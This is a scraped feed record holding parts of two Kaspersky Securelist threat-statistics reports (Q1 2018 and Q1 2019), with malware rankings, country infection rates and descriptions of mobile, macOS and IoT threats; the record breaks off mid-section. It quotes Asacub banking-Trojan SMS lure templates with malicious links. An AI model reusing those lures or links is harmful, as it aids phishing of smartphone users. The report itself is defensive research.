Trojan-Ransom.Win32.Shade | 2.61 | \n7 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.64 | \n8 | Crysis | Trojan-Ransom.Win32.Crusis | 1.62 | \n9 | Locky | Trojan-Ransom.Win32.Locky | 1.23 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.15 | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThis quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that's been around for a while. This malware substitutes user files with modified instances of its own body, and places victim data inside these copies in an encrypted format. Statistics show that a new modification detected in December immediately began to attack user computers.\n\nThe remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2018, Kaspersky Lab solutions blocked **796,806,112 **attacks launched from Internet resources located in 194 countries worldwide. **282,807,433** unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of triggers in response to attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171439/180511-it-threats-q1-18-statistics-17.png>)\n\n_Distribution of web attack sources by country, Q1 2018_\n\nThis quarter, Web Anti-Virus was most active on resources located in the US (39.14%). Canada, China, Ireland, and Ukraine dropped out of TOP 10 to be replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Belarus | 40.90 \n2 | Ukraine | 40.32 \n3 | Algeria | 39.69 \n4 | Albania | 37.33 \n5 | Moldova | 37.17 \n6 | Greece | 36.83 \n7 | Armenia | 36.78 \n8 | Azerbaijan | 35.13 \n9 | Kazakhstan | 34.64 \n10 | Russia | 34.56 \n11 | Kyrgyzstan | 33.77 \n12 | Venezuela | 33.10 \n13 | Uzbekistan | 31.52 \n14 | Georgia | 31.40 \n15 | Latvia | 29.85 \n16 | Tunisia | 29.77 \n17 | Romania | 29.09 \n18 | Qatar | 28.71 \n19 | Vietnam | 28.66 \n20 | Serbia | 28.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.69% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png>)\n\n_Geography of malicious web attacks in Q1 2018 (percentage of attacked users)_\n\nThe countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.). _\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q1 2018, our File Anti-Virus detected **187,597,494** malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only **Malware-class** attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.03 \n2 | Afghanistan | 56.02 \n3 | Yemen | 54.99 \n4 | Tajikistan | 53.08 \n5 | Algeria | 49.07 \n6 | Turkmenistan | 48.68 \n7 | Ethiopia | 48.21 \n8 | Mongolia | 46.84 \n9 | Kyrgyzstan | 46.53 \n10 | Sudan | 46.44 \n11 | Vietnam | 46.38 \n12 | Syria | 46.12 \n13 | Rwanda | 46.09 \n14 | Laos | 45.66 \n15 | Libya | 45.50 \n16 | Djibouti | 44.96 \n17 | Iraq | 44.65 \n18 | Mauritania | 44.55 \n19 | Kazakhstan | 44.19 \n20 | Bangladesh | 44.15 \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n_** _Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat in Q1.\n\nThe figure for Russia was 30.92%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png>)\n\n**The safest countries in terms of infection risk included** Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).", "cvss3": {}, "published": "2018-05-14T10:00:30", "type": "securelist", "title": "IT threat evolution Q1 2018. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-4878"], "modified": "2018-05-14T10:00:30", "id": "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "href": "https://securelist.com/it-threat-evolution-q1-2018-statistics/85541/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T14:29:14", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.\n * 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 243,604 users.\n * Ransomware attacks were defeated on the computers of 284,489 unique users.\n * Our File Anti-Virus detected 247,907,593 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 905,174 malicious installation packages\n * 29,841 installation packages for mobile banking Trojans\n * 27,928 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nQ1 2019 is remembered mainly for mobile financial threats.\n\nFirst, the operators of the Russia-targeting Asacub Trojan made several large-scale distribution attempts, reaching up to 13,000 unique users per day. The attacks used active bots to send malicious links to contacts in already infected smartphones. The mailings contained one of the following messages:\n\n_{Name of victim}, you received a new mms: ____________________________ from {Name of victim's contact}_ \n_{Name of victim}, the mms: smsfn.pro/3ftjR was received from {Name of victim's contact}_ \n_{Name of victim}, photo: smslv.pro/c0Oj0 received from {Name of victim's contact}_ \n_{Name of victim}, you have an mms notification ____________________________ from {Name of victim's contact}_\n\nSecond, the start of the year saw a rise in the number of malicious apps in the Google Play store aimed at stealing credentials from users of Brazilian online banking apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172941/it-threat-stats-q1-2019-1.png>)\n\nAlthough such malware appeared on the most popular app platform, the number of downloads was extremely low. We are inclined to believe that cybercriminals are having problems luring victims to pages with malicious apps.\n\n### Mobile threat statistics\n\nIn Q1 2019, Kaspersky Lab detected 905,174 malicious installation packages, which is 95,845 packages down on the previous quarter.\n\n_Number of detected malicious installation packages, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171046/mobile-malware-apk.png>)\n\n#### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile apps by type, Q4 2018 and Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171122/infographic.png>)\n\nAmong all the threats detected in Q1 2019, the lion's share went to potentially unsolicited RiskTool apps with 29.80%, a fall of 19 p.p. against the previous quarter. The most frequently encountered objects came from the RiskTool.AndroidOS.Dnotua (28% of all detected threats of this class), RiskTool.AndroidOS.Agent (27%), and RiskTool.AndroidOS.SMSreg (16%) families.\n\nIn second place were threats in the Trojan-Dropper class (24.93%), whose share increased by 13 p.p. The vast majority of files detected belonged to the Trojan-Dropper.AndroidOS.Wapnor families (93% of all detected threats of this class). Next came the Trojan-Dropper.AndroidOS.Agent (3%) and Trojan-Dropper.AndroidOS.Hqwar (2%) families, and others.\n\nThe share of advertising apps (adware) doubled compared to Q4 2018. The AdWare.AndroidOS.Agent (44.44% of all threats of this class), AdWare.AndroidOS.Ewind (35.93%), and AdWare.AndroidOS.Dnotua (4.73%) families were the biggest contributors.\n\nThe statistics show a significant rise in the number of mobile financial threats in Q1 2019. If in Q4 2018 the share of mobile banking Trojans was 1.85%, in Q1 2019 the figure stood at 3.24% of all detected threats.\n\nThe most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (20% of all detected mobile bankers), Trojan-Banker.AndroidOS.Asacub (18%), and Trojan-Banker.AndroidOS.Agent (15%) families.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n| **Verdict ** | **%*** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 54.26 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.72 \n3 | Trojan-Banker.AndroidOS.Asacub.snt | 4.98 \n4 | DangerousObject.AndroidOS.GenericML | 4.35 \n5 | Trojan-Banker.AndroidOS.Asacub.a | 3.49 \n6 | Trojan-Dropper.AndroidOS.Hqwar.bb | 3.36 \n7 | Trojan-Dropper.AndroidOS.Lezok.p | 2.60 \n8 | Trojan-Banker.AndroidOS.Agent.ep | 2.53 \n9 | Trojan.AndroidOS.Dvmap.a | 1.84 \n10 | Trojan-Banker.AndroidOS.Svpeng.q | 1.83 \n11 | Trojan-Banker.AndroidOS.Asacub.cp | 1.78 \n12 | Trojan.AndroidOS.Agent.eb | 1.74 \n13 | Trojan.AndroidOS.Agent.rt | 1.72 \n14 | Trojan-Banker.AndroidOS.Asacub.ce | 1.70 \n15 | Trojan-SMS.AndroidOS.Prizmes.a | 1.66 \n16 | Exploit.AndroidOS.Lotoor.be | 1.59 \n17 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.57 \n18 | Trojan-Dropper.AndroidOS.Tiny.d | 1.51 \n19 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.49 \n20 | Trojan.AndroidOS.Triada.dl | 1.47 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked._\n\nAs is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place came Trojan.AndroidOS.Boogr.gsh (12.72%). This verdict is assigned to files recognized as malicious by our system [based on machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird place went to the Trojan-Banker.AndroidOS.Asacub.snt banker (4.98%). In Q1, this family was well represented in our Top 20: four positions out of 20 (3rd, 5th, 11th, 14th).\n\nThe DangerousObject.AndroidOS.GenericML verdict (4.35%), which ranked fourth in Q1, is perhaps the most interesting. It is given to files detected by machine learning. But unlike the Trojan.AndroidOS.Boogr.gsh verdict, which is assigned to malware that is processed and detected inside Kaspersky Lab's infrastructure, the DangerousObject.AndroidOS.GenericML verdict is given to files on the side of users of the company's security solutions before such files go for processing. The latest threat patterns are now detected this way.\n\nSixth and seventeenth places were taken by members of the Hqwar dropper family: Trojan-Dropper.AndroidOS.Hqwar.bb (3.36%) and Trojan-Dropper.AndroidOS.Hqwar.gen (1.57%), respectively. These packers most often contain banking Trojans, including Asacub.\n\nSeventh position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.60%). The Lezok family is notable for its variety of distribution schemes, among them a supply chain attack, whereby the malware is sewn into the firmware of the mobile device before delivery to the store. This is very dangerous for two reasons:\n\n * It is extremely difficult for an ordinary user to determine whether their device is already infected.\n * Getting rid of such malware is highly complex.\n\nThe Lezok Trojan family is designed primarily to display persistent ads, sign users up for paid SMS subscriptions, and inflate counters for apps on various platforms.\n\nThe last Trojan worthy of a mention on the topic of the Top 20 mobile threats is Trojan-Banker.AndroidOS.Agent.ep. It is encountered both in standalone form and inside Hqwar droppers. The malware has extensive capabilities for countering dynamic analysis, and can detect being launched in the Android Emulator or Genymotion environment. It can open arbitrary web pages to phish for login credentials. It uses Accessibility Services to obtain various rights and interact with other apps.\n\n### Geography of mobile threats\n\n_Map of mobile malware infection attempts, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172806/en-mobile-malware-map.png>)\n\nTop 10 countries by share of users attacked by mobile malware:\n\n| Country* | %** \n---|---|--- \n1 | Pakistan | 37.54 \n2 | Iran | 31.55 \n3 | Bangladesh | 28.38 \n4 | Algeria | 24.03 \n5 | Nigeria | 22.59 \n6 | India | 21.53 \n7 | Tanzania | 20.71 \n8 | Indonesia | 17.16 \n9 | Kenya | 16.27 \n10 | Mexico | 12.01 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nPakistan (37.54%) ranked first, with the largest number of users in this country being attacked by AdWare.AndroidOS.Agent.f, AdWare.AndroidOS.Ewind.h, and AdWare.AndroidOS.HiddenAd.et adware.\n\nSecond place was taken by Iran (31.55%), which appears consistently in the Top 10 every quarter. The most commonly encountered malware in this country was Trojan.AndroidOS.Hiddapp.bn, as well as the potentially unwanted apps RiskTool.AndroidOS.Dnotua.yfe and RiskTool.AndroidOS.FakGram.a. Of these three, the latter is the most noteworthy \u2013 the main task of this app is to intercept Telegram messages. It should be mentioned that Telegram is banned in Iran, so any of its clones are in demand, as confirmed by the infection statistics.\n\nThird place went to Bangladesh (28.38%), where in Q1 the same advertising apps were weaponized as in Pakistan.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **29,841** installation packages for mobile banking Trojans, almost 11,000 more than in Q4 2018.\n\nThe greatest contributions came from the creators of the Trojan-Banker.AndroidOS.Svpeng (20% of all detected banking Trojans), the second-place Trojan-Banker.AndroidOS.Asacub (18%), and the third-place Trojan-Banker.AndroidOS.Agent (15%) families.\n\n_Number of installation packages for mobile banking Trojans, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171308/banking-malware-apk.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.snt | 23.32 \n2 | Trojan-Banker.AndroidOS.Asacub.a | 16.35 \n3 | Trojan-Banker.AndroidOS.Agent.ep | 11.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 8.57 \n5 | Trojan-Banker.AndroidOS.Asacub.cp | 8.33 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.96 \n7 | Trojan-Banker.AndroidOS.Svpeng.ak | 7.00 \n8 | Trojan-Banker.AndroidOS.Agent.eq | 4.96 \n9 | Trojan-Banker.AndroidOS.Asacub.ar | 2.47 \n10 | Trojan-Banker.AndroidOS.Hqwar.t | 2.10 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by banking threats._\n\nThis time, fully half the Top 10 banking threats are members of the Trojan-Banker.AndroidOS.Asacub family: five positions out of ten. The creators of this Trojan actively distributed samples throughout Q1. In particular, the number of users attacked by the Asacub.cp Trojan reached 8,200 per day. But even this high result was surpassed by Asacub.snt with 13,000 users per day at the peak of the campaign.\n\nIt was a similar story with Trojan-Banker.AndroidOS.Agent.ep: We recorded around 3,000 attacked users per day at its peak. However, by the end of the quarter, the average daily number of attacked unique users had dropped below 1,000. Most likely, this was due not to decreased demand for the Trojan, but to cybercriminals' transition to a two-stage system of infection using Hqwar droppers.\n\n_Geography of mobile banking threats, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171335/en-banking-malware-map.png>)\n\n**Top 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Australia | 0.81 \n2 | Turkey | 0.73 \n3 | Russia | 0.64 \n4 | South Africa | 0.35 \n5 | Ukraine | 0.31 \n6 | Tajikistan | 0.25 \n7 | Armenia | 0.23 \n8 | Kyrgyzstan | 0.17 \n9 | US | 0.16 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nIn Q1 2019, Australia (0.81%) took first place in our Top 10. The most common infection attempts we registered in this country were by Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep. Both types of malware are not exclusive to Australia, and used for attacks worldwide.\n\nSecond place was taken by Turkey (0.73%), where, as in Australia, Trojan-Banker.AndroidOS.Agent.ep was most often detected.\n\nRussia is in third place (0.64%), where we most frequently detected malware from the Asacub and Svpeng families.\n\n### Mobile ransomware\n\nIn Q1 2019, we detected **27,928** installation packages of mobile ransomware, which is 3,900 more than in the previous quarter.\n\n_Number of mobile ransomware installation packages detected by Kaspersky Lab (Q2 2018 \u2013 Q1 2019)_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171455/mobile-ransomware.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ah | 28.91 \n2 | Trojan-Ransom.AndroidOS.Rkor.h | 19.42 \n3 | Trojan-Ransom.AndroidOS.Svpeng.aj | 9.46 \n4 | Trojan-Ransom.AndroidOS.Small.as | 8.81 \n5 | Trojan-Ransom.AndroidOS.Rkor.snt | 5.36 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 5.21 \n7 | Trojan-Ransom.AndroidOS.Small.o | 3.24 \n8 | Trojan-Ransom.AndroidOS.Fusob.h | 2.74 \n9 | Trojan-Ransom.AndroidOS.Small.ce | 2.49 \n10 | Trojan-Ransom.AndroidOS.Svpeng.snt | 2.33 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by ransomware._\n\nIn Q1 2019, the most common mobile ransomware family was Svpeng with four positions in the Top 10.\n\n_Geography of mobile ransomware, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171523/en-mobile-ransomware-map.png>)\n\nTop 10 countries by share of users attacked by mobile ransomware:\n\n| Country* | %** \n---|---|--- \n1 | US | 1.54 \n2 | Kazakhstan | 0.36 \n3 | Iran | 0.28 \n4 | Pakistan | 0.14 \n5 | Mexico | 0.10 \n6 | Saudi Arabia | 0.10 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Indonesia | 0.05 \n10 | Belgium | 0.05 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile ransomware as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nThe Top 3 countries by number of users attacked by mobile ransomware, as in the previous quarter, were the US (1.54%), Kazakhstan (0.36%), and Iran (0.28%)\n\n## Attacks on Apple macOS\n\nOn the topic of threats to various platforms, such a popular system as macOS cannot be ignored. Although new malware families for this platform are relatively rare, threats do exist for it, largely in the shape of adware.\n\nThe modus operandi of such apps is widely known: infect the victim, take root in the system, and show advertising banners. That said, for each ad displayed and banner clicked the attackers receive a very modest fee, so they need:\n\n 1. The code that displays the advertising banner to run as often as possible on the infected machine,\n 2. The victim to click on the banners as often as possible,\n 3. As many victims as possible.\n\nIt should be noted that the adware infection technique and adware behavior on the infected machine at times differ little from malware. Meanwhile, the banners themselves can be shown in an arbitrary place on the screen at any time, be it in an open browser window, in a separate window in the center of the screen, etc.\n\n### Top 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.62 \n2 | AdWare.OSX.Spc.a | 20.07 \n3 | AdWare.OSX.Pirrit.j | 10.31 \n4 | AdWare.OSX.Pirrit.p | 8.44 \n5 | AdWare.OSX.Agent.b | 8.03 \n6 | AdWare.OSX.Pirrit.o | 7.45 \n7 | AdWare.OSX.Pirrit.s | 6.88 \n8 | AdWare.OSX.Agent.c | 6.03 \n9 | AdWare.OSX.MacSearch.a | 5.95 \n10 | AdWare.OSX.Cimpli.d | 5.72 \n11 | AdWare.OSX.Mcp.a | 5.71 \n12 | AdWare.OSX.Pirrit.q | 5.55 \n13 | AdWare.OSX.MacSearch.d | 4.48 \n14 | AdWare.OSX.Agent.a | 4.39 \n15 | Downloader.OSX.InstallCore.ab | 3.88 \n16 | AdWare.OSX.Geonei.ap | 3.75 \n17 | AdWare.OSX.MacSearch.b | 3.48 \n18 | AdWare.OSX.Geonei.l | 3.42 \n19 | AdWare.OSX.Bnodlero.q | 3.33 \n20 | RiskTool.OSX.Spigot.a | 3.12 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab's security solutions for macOS that were attacked._\n\nTrojan-Downloader.OSX.Shlayer.a (24.62%) finished first in our ranking of macOS threats. Malware from the Shlayer family is distributed under the guise of Flash Player or its updates. Their main task is to download and install various advertising apps, including Bnodlero.\n\nAdWare.OSX.Spc.a (20.07%) and AdWare.OSX.Mcp.a (5.71%) are typical adware apps that are distributed together with various \"cleaner\" programs for macOS. After installation, they write themselves to the autoloader and run in the background.\n\nMembers of the AdWare.OSX.Pirrit family add extensions to the victim's browser; some versions also install a proxy server on the victim's machine to intercept traffic from the browser. All this serves one purpose \u2013 to inject advertising into web pages viewed by the user.\n\nThe malware group consisting of AdWare.OSX.Agent.a, AdWare.OSX.Agent.b, and AdWare.OSX.Agent.c is closely related to the Pirrit family, since it often downloads members of the latter. It can basically download, unpack, and launch different files, as well as embed JS code with ads into web pages seen by the victim.\n\nAdWare.OSX.MacSearch is another family of advertising apps with extensive tools for interacting with the victim's browser. It can manipulate the browser history (read/write), change the browser search system to its own, add extensions, and embed advertising banners on pages viewed by the user. Plus, it can download and install other apps without the user's knowledge.\n\nAdWare.OSX.Cimpli.d (5.72%) is able to download and install other advertising apps, but its main purpose is to change the browser home page and install advertising extensions. As with other adware apps, all these actions have the aim of displaying ads in the victim's browser.\n\nThe creators of the not-a-virus:Downloader.OSX.InstallCore family, having long perfected their tricks on Windows, transferred the same techniques to macOS. The typical InstallCore member is in fact an installer (more precisely, a framework for creating an installer with extensive capabilities) of other programs that do not form part of the main InstallCore package and are downloaded separately. Besides legitimate software, it can distribute less salubrious apps, including ones containing aggressive advertising. Among other things, InstallCore is used to distribute DivX Player.\n\nThe AdWare.OSX.Geonei family is one of the oldest adware families for macOS. It employs creator-owned obfuscation techniques to counteract security solutions. As is typical for adware programs, its main task is to display ads in the browser by embedding them in the HTML code of the web-page.\n\nLike other similar apps, AdWare.OSX.Bnodlero.q (3.33%) installs advertising extensions in the user's browser, and changes the default search engine and home page. What's more, it can download and install other advertising apps.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 11.54 \n2 | Spain | 9.75 \n3 | India | 8.83 \n4 | Italy | 8.20 \n5 | US | 8.03 \n6 | Canada | 7.94 \n7 | UK | 7.52 \n8 | Russia | 7.51 \n9 | Brazil | 7.45 \n10 | Mexico | 6.99 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's security solutions for macOS (under 10,000)._ \n_** Unique attacked users as a percentage of all users of Kaspersky Lab's security solutions for macOS in the country._\n\nIn Q1 2019, France (11.54%) took first place in the Top 10. The most common infection attempts we registered in this country came from Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a \u0438 AdWare.OSX.Bnodlero.q.\n\nUsers from Spain (9.75%), India (8.83%), and Italy (8.20%) \u2013 who ranked second, third, and fourth, respectively \u2013 most often encountered Trojan-Downloader.OSX.Shlayer.a, AdWare .OSX.Spc.a, AdWare.OSX.Bnodlero.q, AdWare.OSX.Pirrit.j, and AdWare.OSX.Agent.b\n\nFifth place in the ranking went to the US (8.03%), which saw the same macOS threats as Europe. Note that US residents also had to deal with advertising apps from the Climpi family.\n\n## IoT attacks\n\n### Interesting events\n\nIn Q1 2019, we noticed several curious features in the behavior of IoT malware. First, some Mirai samples were equipped with a tool for artificial environment detection: If the malware detected it was running in a sandbox, it stopped working. The implementation was primitive \u2013 scanning for the presence of procfs.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172955/it-threat-stats-q1-2019-6.png>)\n\nBut we expect it to become more complex in the near future.\n\nSecond, one of the versions of Mirai was spotted to contain a mechanism for clearing the environment of other bots. It works using templates, killing the process if its name matches that of the template. Interestingly, Mirai itself ended up in the list of such names (the malware itself does not contain \"mirai\" in the process name):\n\n * dvrhelper\n * dvrsupport\n * **mirai**\n * blade\n * demon\n * hoho\n * hakai\n * satori\n * messiah\n * mips\n\nLastly, a few words about a miner with an old exploit for Oracle Weblogic Server, although it is not actually an IoT malware, but a Trojan for Linux.\n\nTaking advantage of the fact that Weblogic Server is cross-platform and can be run on a Windows host or under Linux, the cybercriminals embedded checks for different operating systems, and are now attacking Windows hosts along with Linux.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22173014/it-threat-stats-q1-2019-7.png>)\n\n_Section of code responsible for attacking Windows and Linux hosts_\n\n### IoT threat statistics\n\nQ1 demonstrated that there are still many devices in the world that attack each other through telnet. Note, however, that it has nothing to do with the qualities of the protocol. It is just that devices or servers managed through SSH are closely monitored by administrators and hosting companies, and any malicious activity is terminated. This is one reason why there are significantly fewer unique addresses attacking via SSH than there are IP addresses from which the telnet attacks come. \n \nSSH | 17% \nTelnet | 83% \n \n_Table of the popularity distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2019_\n\nNevertheless, cybercriminals are actively using powerful servers to manage their vast botnets. This is seen by the number of sessions in which cybercriminal servers interact with Kaspersky Lab's traps. \n \nSSH | 64% \nTelnet | 36% \n \n_Table of distribution of cybercriminal working sessions with Kaspersky Lab's traps, Q1 2019_\n\nIf attackers have SSH access to an infected device, they have far greater scope to monetize the infection. In the overwhelming majority of cases involving intercepted sessions, we registered spam mailings, attempts to use our trap as a proxy server, and (least often of all) cryptocurrency mining.\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's telnet traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171650/en-iot-telnet-map.png>)\n\nTop 10 countries where devices were located that carried out telnet-based attacks on Kaspersky Lab's traps.\n\n| Country | %* \n---|---|--- \n1 | Egypt | 13.46 \n2 | China | 13.19 \n3 | Brazil | 11.09 \n4 | Russia | 7.17 \n5 | Greece | 4.45 \n6 | Jordan | 4.14 \n7 | US | 4.12 \n8 | Iran | 3.24 \n9 | India | 3.14 \n10 | Turkey | 2.49 \n \n_* Infected devices in the country as a percentage of the total number of all infected IoT devices attacking via telnet._\n\nIn Q1 2019, Egypt (13.46%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab's traps. Second place by a small margin goes to China (13.19%), with Brazil (11.09%) in third.\n\nCybercriminals most often used telnet attacks to infect devices with one of the many Mirai family members.\n\n**Top 10 malware downloaded to infected IoT devices following a successful telnet attack**\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 71.39 \n2 | Backdoor.Linux.Mirai.ba | 20.15 \n3 | Backdoor.Linux.Mirai.au | 4.85 \n4 | Backdoor.Linux.Mirai.c | 1.35 \n5 | Backdoor.Linux.Mirai.h | 1.23 \n6 | Backdoor.Linux.Mirai.bj | 0.72 \n7 | Trojan-Downloader.Shell.Agent.p | 0.06 \n8 | Backdoor.Linux.Hajime.b | 0.06 \n9 | Backdoor.Linux.Mirai.s | 0.06 \n10 | Backdoor.Linux.Gafgyt.bj | 0.04 \n \n_* Share of malware in the total amount of malware downloaded to IoT devices following a successful telnet attack_\n\nIt is worth noting that bots based on Mirai code make up most of the Top 10. There is nothing surprising about this, and the situation could persist for a long time given Mirai's universality.\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's SSH traps, Q1 